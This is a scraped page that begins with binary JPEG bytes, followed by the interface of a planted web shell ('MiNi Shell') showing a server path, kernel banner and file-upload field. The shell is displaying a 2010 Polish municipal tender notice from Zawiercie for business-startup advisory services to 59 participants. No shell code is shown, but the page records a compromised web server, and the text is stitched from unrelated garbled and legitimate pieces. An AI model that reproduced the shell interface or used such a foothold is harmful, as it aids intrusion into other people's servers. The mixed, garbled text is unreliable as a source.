JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100601/152894-N-2010.html

<p class="kh_header"><b>Zawiercie: Doradztwo przed założeniem działalności gospodarczej w zakresie: tworzenia biznesplanu, księgowości, porad prawnych, porad z dziedziny ubezpieczeń, marketingu, zagadnień z dziedziny BHP dla uczestników projektu Nasz cel - Twoja firma realizowane w ramach Działania 6.2 Wsparcie oraz promocja przedsiębiorczości i samozatrudnienia.</b><br>
<b>Numer ogłoszenia: 152894 - 2010; data zamieszczenia: 01.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Zawiercie , ul. Leśna 2, 42-400 Zawiercie, woj. śląskie, tel. 032 6722684, faks 032 6721513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.eu</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Doradztwo przed założeniem działalności gospodarczej w zakresie: tworzenia biznesplanu, księgowości, porad prawnych, porad z dziedziny ubezpieczeń, marketingu, zagadnień z dziedziny BHP dla uczestników projektu Nasz cel - Twoja firma realizowane w ramach Działania 6.2 Wsparcie oraz promocja przedsiębiorczości i samozatrudnienia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie doradztwa przed założeniem działalności gospodarczej w zakresie: tworzenia biznesplanu, księgowości, porad prawnych, porad z dziedziny ubezpieczeń, marketingu, zagadnień z dziedziny BHP dla uczestników projektu Nasz cel - Twoja Firma realizowanego w ramach Działania 6.2 Wsparcie oraz promocja przedsiębiorczości i samozatrudnienia.
Doradztwo skierowane jest do 59 osób uczestników projektu.
Zamawiający zastrzega, że wynagrodzenie ulegnie obniżeniu (w stosunku do całkowitego wynagrodzenia brutto) proporcjonalnie do liczby godzin udzielonego doradztwa, maksymalnie jednak do 50%.
Doradztwo zostanie przeprowadzone na terenie miasta Zawiercia.
Wykonawca zobowiązany będzie do zapewnienia ciągłego kontaktu poprzez osobę upoważnioną (np. osoba ds. obsługi technicznej) z biurem projektu polegający między innymi na: wyznaczeniu bezpośredniego numeru kontaktowego oraz adresu e-mail do osoby upoważnionej, dziennych raportów z realizacji doradztwa przesyłanych na adres 
e-mail Lidera projektu (raport powinien zawierać informację o czasie trwania doradztwa, ilości uczestników uczestniczących w danym dniu w doradztwie, dokumentację fotograficzną przedstawiającą oznakowanie miejsc doradztwa, sale) najpóźniej do godziny 9:00 dnia następującego po dniu, którego dotyczy raport. 

1.	Cele doradztwa.
Zdobycie wiedzy z zakresu: tworzenia biznesplanu, księgowości, porad prawnych, porad z dziedziny ubezpieczeń, marketingu, zagadnień z dziedziny BHP.
2.  Metodyka doradztwa.
Doradztwo będzie odbywać się na zasadzie indywidualnych rozmów z uczestnikami projektu ukierunkowanych na wskazane przez uczestnika zagadnienia.
3.  Materiały dotyczące realizacji doradztwa.
Uczestnik doradztwa otrzyma materiały niezbędne podczas świadczenia usługi doradczej (np. wzory formularzy) oraz POTWIERDZENIE WYKONANIA USŁUGI DORADCZEJ (formularz stanowi załącznik do Wytycznych w sprawie udzielania pomocy na rozwój przedsiębiorczości w ramach Działania 6.2 Promocja przedsiębiorczości i samo zatrudnienia Programu Operacyjnego Kapitał Ludzki w województwie śląskim) wystawione przez doradcę bezpośrednio po zakończeniu usługi doradczej.
4.  Harmonogram realizacji doradztwa.
Wykonawca przedstawi Zamawiającemu harmonogram doradztwa, który powinien być dostosowany do potrzeb uczestników projektu. Doradztwo powinno odbywać się w godzinach od 7 rano do godziny 20 na terenie miasta Zawiercia w wynajętych przez wykonawcę pomieszczeniach, przy założeniu, że doradcy powinni być dostępni dla uczestników projektu:
x przynajmniej pięć dni w tygodniu: doradcy do spraw biznes planu oraz księgowości;
x doradcy do spraw marketingu oraz prawa przynajmniej cztery dni w tygodniu;
x doradcy do spraw ubezpieczeń i BHP przynajmniej dwa dni w tygodniu. 
Dyspozycyjność doradców powinna być pełna w omawianym zakresie godzinowym, 
czyli od godziny 7 do 20. Dokładny harmonogram doradztwa jest ustalany przez Zamawiającego w porozumieniu z Wykonawcą, ale przy pełnym uwzględnieniu potrzeb każdego poszczególnego uczestnika projektu. Doradztwo może odbywać się w każdym dniu tygodnia łącznie z sobotami i niedzielami w zależności od potrzeb uczestników projektu. Harmonogram może ulec zmianie w trakcie wykonywania doradztwa - 
w szczególności ze względu na potrzeby uczestników projektu.
5.  Ramowa tematyka doradztwa:
1)	Tworzenie biznesplanu;
2)	Księgowość;
3)	Porady prawne;
4)	Porady z dziedziny ubezpieczeń;
5)	Marketing;
6)	Zagadnienia z dziedziny BHP.
6.  Szczegółowa tematyka doradztwa:
Udzielane porady muszą być zgodne z Wytycznymi w sprawie udzielania pomocy na rozwój przedsiębiorczości w ramach Działania 6.2 Promocja przedsiębiorczości i samozatrudnienia Programu Operacyjnego Kapitał Ludzki w województwie śląskim.

Lp.	Temat:
1.	Tworzenie biznesplanu.

1.1.	Jak napisać biznesplan - praktyczne wskazówki oraz dobre praktyki.
1.2.	Analizę mikro i makro otoczenia przedsięwzięcia.
1.3.	Konstruowanie poprawnych założeń:
x finansowych;
x przychodów;
x kosztów inwestycji.
1.4.	Wypełnianie wniosku o wsparcie finansowe oraz wsparcie pomostowe.
2.	Księgowość.
2.1.	Zarządzanie finansami firmy.
2.2.	Planowanie.
2.3.	Kontrola działalności zgodnie z zachowaniem zasad rachunkowości.
2.4.	Zorganizowanie rachunkowości w firmie.
2.5.	Prowadzenie dokumentacji majątku firmy.
2.6.	Prowadzenie dokumentacji operacji finansowych.
2.7.	Sporządzanie raportów finansowych.
2.8.	Wykonywanie bilansu i jego analiza.
2.9.	Prowadzenie rachunku kosztów i wyników.
2.10.	Prawo podatkowe, ustawa o rachunkowości, regulacje podatkowe.
2.11.	Aktualne zasady prowadzenia księgowości w przedsiębiorstwie.
2.12.	Sporządzanie deklaracji PIT, ZUS, VAT, CIT.
2.13.	Karta podatkowa.
2.14.	Ryczałt od przychodów ewidencjonowanych.
2.15.	Podatkowa księga przychodów i rozchodów.
2.16.	Księgi rachunkowe.
2.17.	Regulacje prawne rynku finansów.
3.	Porady prawne.
3.1.	Rejestrowanie działalności gospodarczej:
x niezbędne dokumenty;
x obowiązujące procedury.
3.2.	Prawo:
x handlowe;
x cywilne;
x podatkowe;
x pracy:
- formy zatrudnienia;
- czas pracy;
- urlopy pracownicze;
- inne nieobecności w pracy;
- wynagrodzenie za pracę;
- regulamin pracy i wynagradzania.
3.3.	Przygotowaniu umów handlowych według obowiązujących przepisów prawnych.
3.4.	Spółki:
x handlowe:
- osobowe;
- kapitałowe;
x cywilne.
4.	Porady z dziedziny ubezpieczeń.
4.1.	Przepisy regulujące rynek ubezpieczeń.
4.2.	Doradztwo w zakresie wyboru firmy ubezpieczeniowej.
5.	Marketing.
5.1.	Elementy marketingu.
5.2.	Sprzedaż osobista.
5.3.	E-marketing.
5.4.	Pozytywny wizerunek firmy.
5.5.	Funkcje produktu.
5.6.	Reklama.
5.7.	Promocja.
5.8.	Public relations.
5.9.	Media.
5.10.	Analiza rynku:
x ustalanie współzależności między zjawiskami ekonomicznymi, społecznymi, wpływającymi na funkcjonowanie rynku;
x ustalanie współzależności między popytem, podażą a ceną - odnoszących się do produktów usług, inwestycji, transakcji kapitałowych;
x gromadzenie i interpretacja danych;
x określanie tendencji rozwojowej i sezonowości podaży i popytu na poszczególne produkty.
5.11.	Negocjacje z klientem:
x Umiejętności społeczne ważne w kontekście negocjacji;
x Przebieg negocjacji;
x Twórcze analizowanie sytuacji w negocjacjach;
x Rozwiązywanie konfliktów.
6.	Zagadnienia z dziedziny BHP.
6.1.	Przepisy BHP.
6.2.	Instruktaż ogólny:
x nowi pracownicy;
x praktykanci;
x uczniowie.
6.3.	Instruktaż stanowiskowy - jak przeprowadzić szkolenie wstępne na stanowisku pracy.
Łączna liczba godzin dydaktycznych doradztwa: 472 
(po 8 godzin dla każdego z 59 uczestników projektu)
Godzina dydaktyczna równa się 45 minutom zegarowym.
7. Dokumentacja doradztwa.
Wykonawca jest zobowiązany do prowadzenia list ewidencjonujących obecności uczestników projektu na poszczególnych spotkaniach z doradcami ze szczególnym uwzględnieniem czasu trwania usługi doradczej.
8. Koszt całkowity usługi doradztwa obejmuje w szczególności:
1)	Wynagrodzenie doradców;
2)	Koszty materiały niezbędne podczas świadczenia usługi doradczej (np. wzory
3)	formularzy).
4)	Koszt wynajmu sal z odpowiednim zapleczem technicznym i sanitarnym.
5)	Wodę mineralną dla uczestników. 
6)	Wynagrodzenie osoby zapewniającej obsługę techniczną.

Zamawiający wymaga od Wykonawcy zapewnienia odpowiedniej obsługi technicznej doradztwa poprzez wyznaczenie osoby odpowiedzialnej (osoba ta nie może być jednocześnie doradcą w danym dniu) między innymi za:
x otwarcie i wietrzenie sal,
x napoje oraz naczynia jednorazowe,
x codzienne raportowanie o stanie realizacji zadań,
x rozwieszenie i stałe monitorowanie plakatów projektu oraz odpowiednich informacji o umiejscowieniu sal i współfinansowaniu doradztwa przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki,
x wykonywanie dokumentacji fotograficznej rozmieszczenia plakatów, informacji, sal;
x zaopatrzenie toalet w odpowiednie środki higieniczne (papier toaletowy, mydło, ręczniki);
x uruchomienie sprzętu technicznego przed doradztwem.

Zamawiający wymaga również, aby sale doradcze były wyposażone w co najmniej jeden stolik i trzy krzesła lub fotele oraz komputer z dostępem do sieci Internet. Przed salą musi znajdować się miejsce do oczekiwania na doradztwo (co najmniej jedno krzesło lub fotel lub kanapa). Wewnątrz oraz na zewnątrz sal musi znajdować się plakat projektu oraz informacja o współfinansowaniu doradztwa przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. Informacja 
o odbywającym się doradztwie w ramach projektu musi znajdować się na zewnątrz budynku lub na drzwiach wejściowych. Mając na uwadze indywidualny charakter udzielanego doradztwa Zamawiający wymaga, aby w jednej sali jednocześnie mogło odbywać się doradztwo tylko dla jednego uczestnika.

W budynku w którym odbywać się będzie doradztwo musi znajdować się toaleta dostępna dla uczestników wyposażona w odpowiednie urządzenia sanitarne oraz środki higieniczne (papier toaletowy, mydło, ręczniki lub sprawną suszarkę do rąk).
Podczas usługi doradczej Wykonawca zobowiązany jest do zapewnienia każdorazowo 
(na każdym spotkaniu) poszczególnym uczestnikom jedną butelkę wody mineralnej niegazowanej o pojemności od 0,3 do 0,7 litra oraz kubek jednorazowy. 
W celu zapewnienia optymalnego i dostosowanego do indywidualnych potrzeb uczestników projektu harmonogramu doradztwa, Wykonawca jest zobowiązany do zapewnienia co najmniej sześciu doradców, w tym na każdy z zakresów tematycznych musi przypadać przynajmniej jeden doradca. Ze względu na potencjalne duże zainteresowanie doradztwem z zakresu konstrukcji biznes planu zaleca się zaangażowanie 2 doradców z tego zakresu lub dopuszcza się możliwość, iż doradcy z innych zakresów tematycznych, będą mogli doradzać w zakresie konstruowania biznes planu, o ile spełniają niżej wymienione kryteria dotyczące tej tematyki. Doradcy muszą być specjalistami w swojej dziedzinie, to jest:
1)	Doradca do spraw biznesplanu musi posiadać wykształcenie wyższe lub studia podyplomowe z zakresu związanego z zarządzaniem podmiotami gospodarczymi oraz wykazać się doświadczeniem zawodowym w realizacji usług doradztwa indywidualnego (dla podmiotów trzecich) związanego z opracowywaniem co najmniej 5 biznes planów;
2)	Specjalista z zakresu księgowości musi posiadać wykształcenie wyższe z zakresu finansów lub rachunkowości lub doradztwa podatkowego. Staż pracy musi wynosić co najmniej dwa lata i musi być związany z księgowością lub finansami. Alternatywnie może być to osoba z uprawnieniami do usługowego prowadzenia ksiąg rachunkowych;
3)	Specjalista w zakresie prawa musi posiadać wykształcenie wyższe prawnicze i staż pracy minimum dwa lata związany z doradztwem prawnym;
4)	Specjalista do spraw BHP musi posiadać minimum dwa lata stażu pracy na stanowisku związanym z bezpieczeństwem i higieną pracy;
5)	Specjalista do spraw ubezpieczeń musi posiadać staż pracy przynajmniej dwuletni związany z ubezpieczeniami;
6)	Specjalista do spraw marketingu musi posiadać wykształcenie wyższe lub studia podyplomowe z zakresu marketingu i przynajmniej dwuletni staż pracy związany z marketingiem.

Staż pracy w przypadku powyższych osób należy rozumieć jako stosunek pracy lub wykonywanie czynności w ramach umów cywilno-prawnych.

Doradcy muszą znać treść obowiązujących w dniu rozpoczęcia doradztwa Wytycznych 
w sprawie udzielania pomocy na rozwój przedsiębiorczości w ramach Działania 6.2 Promocja przedsiębiorczości i samozatrudnienia Programu Operacyjnego Kapitał Ludzki 
w województwie śląskim, łącznie z załącznikami do w/w wytycznych. Przed rozpoczęciem doradztwa każdy doradca, musi odbyć rozmowę z Liderem projektu lub osobą przez Lidera wyznaczoną, w celu potwierdzenia znajomości w/w wytycznych. 

Upoważniony przedstawiciel Wykonawcy zobowiązany będzie do osobistego przedstawienia raportu końcowego Liderowi projektu (lub osobie przez Lidera upoważnionej) z działań doradczych oraz osobistego stawienia się każdorazowo na bezpośrednie telefoniczne, pisemne, przesłane za pomocą poczty elektronicznej e-mail lub faksem wezwanie Lidera w biurze projektu lub innym wskazanym miejscu (w Zawierciu i Katowicach) w uzgodnionym terminie, nie później niż do godziny 10:00 dnia następującego po dniu wezwania.

Wykonawca zobowiązany będzie do wskazania numeru telefonu, pod którym będzie możliwy kontakt z Wykonawcą w dni świadczenia doradztwa w godzinach od 7:00 do 20:10.
Zamawiający wymaga, aby oferowane usługi wykonywane były przez Wykonawcę posiadającego certyfikat systemu zarządzania jakością spełniający wymagania normy 
PN-EN ISO 9001:2009 w zakresie świadczenia usług doradczych lub równoważny - opartych na odpowiednich normach europejskich. W celu potwierdzenia, że oferowane usługi odpowiadają w/w wymaganiu określonemu przez zamawiającego, żąda się zaświadczenia (certyfikatu) niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi opartymi na odpowiednich normach europejskich - w zakresie PN-EN ISO 9001:2009 w zakresie świadczenia usług doradczych. 
Wykonawca może zamiast powyższego zaświadczenia (certyfikatu PN-EN ISO 9001:2009 w zakresie świadczenia usług doradczych) złożyć inne dokumenty potwierdzające odpowiednio stosowane przez wykonawców równoważnych środków zapewnienia jakości opartych na odpowiednich normach europejskich.
Szczegółowy zakres przedmiotu zamówienia określa także wzór umowy                     (z załącznikiem), który stanowi załącznik do niniejszej specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie.
Wykonawca przedkładają oświadczenie o spełnianiu warunków sporządzone według wzoru stanowiącego załącznik nr 1 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie.
Wykonawca przedkładają oświadczenie o spełnianiu warunków sporządzone według wzoru stanowiącego załącznik nr 1 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie.
Wykonawca przedkładają oświadczenie o spełnianiu warunków sporządzone według wzoru stanowiącego załącznik nr 1 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy powinni spełniać warunek szczegółowy - dysponowania co najmniej 6 osobami, które będą uczestniczyć w wykonywaniu zamówienia, w tym: 
1)	co najmniej 1 osobą - doradcą do spraw biznes planu, który musi posiadać wykształcenie wyższe lub studia podyplomowe z zakresu związanego z zarządzaniem podmiotami gospodarczymi oraz wykazać się doświadczeniem zawodowym w realizacji usług doradztwa indywidualnego (dla podmiotów trzecich) związanego z opracowywaniem co najmniej 5 biznes planów;
2)	co najmniej 1 osobą - specjalistą z zakresu księgowości, który musi posiadać wykształcenie wyższe z zakresu finansów lub rachunkowości lub doradztwa podatkowego. Staż pracy musi wynosić co najmniej dwa lata i musi być związany z księgowością lub finansami. Alternatywnie może być to osoba z uprawnieniami do usługowego prowadzenia ksiąg rachunkowych;
3)	co najmniej 1 osobą - specjalistą w zakresie prawa, który musi posiadać wykształcenie wyższe prawnicze i staż pracy minimum dwa lata związany z doradztwem prawnym;
4)	co najmniej 1 osobą - specjalistą do spraw BHP, który musi posiadać minimum dwa lata stażu pracy na stanowisku związanym z bezpieczeństwem i higieną pracy;
5)	co najmniej 1 osobą - specjalistą do spraw ubezpieczeń, który musi posiadać staż pracy przynajmniej dwuletni związany z ubezpieczeniami;
6)	co najmniej 1 osobą - specjalistą do spraw marketingu, który musi posiadać wykształcenie wyższe lub studia podyplomowe z zakresu marketingu i przynajmniej dwuletni staż pracy związany z marketingiem.
Ocena spełniania przedstawionego powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.
Wykonawca powinien przedłożyć na potwierdzenie spełniania niniejszego warunku:
1)	Oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 1 do specyfikacji;
2)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia (sporządzony według wzoru stanowiącego załącznik nr 2A do specyfikacji), odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich wykształcenia, kwalifikacji zawodowych, niezbędnych dla wykonania zamówienia, zakresu wykonywanych przez nie czynności, wraz z informacją o podstawie do dysponowania tymi osobami, a także ich życiorysy zawodowe, na okoliczność potwierdzenia doświadczenia zawodowego - przygotowane zgodnie ze wzorem stanowiącym załącznik nr 2B do SIWZ).  

Wykonawca może polegać na osobach zdolnych do wykonania zamówienia, innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie.
Wykonawca przedkładają oświadczenie o spełnianiu warunków sporządzone według wzoru stanowiącego załącznik nr 1 do specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
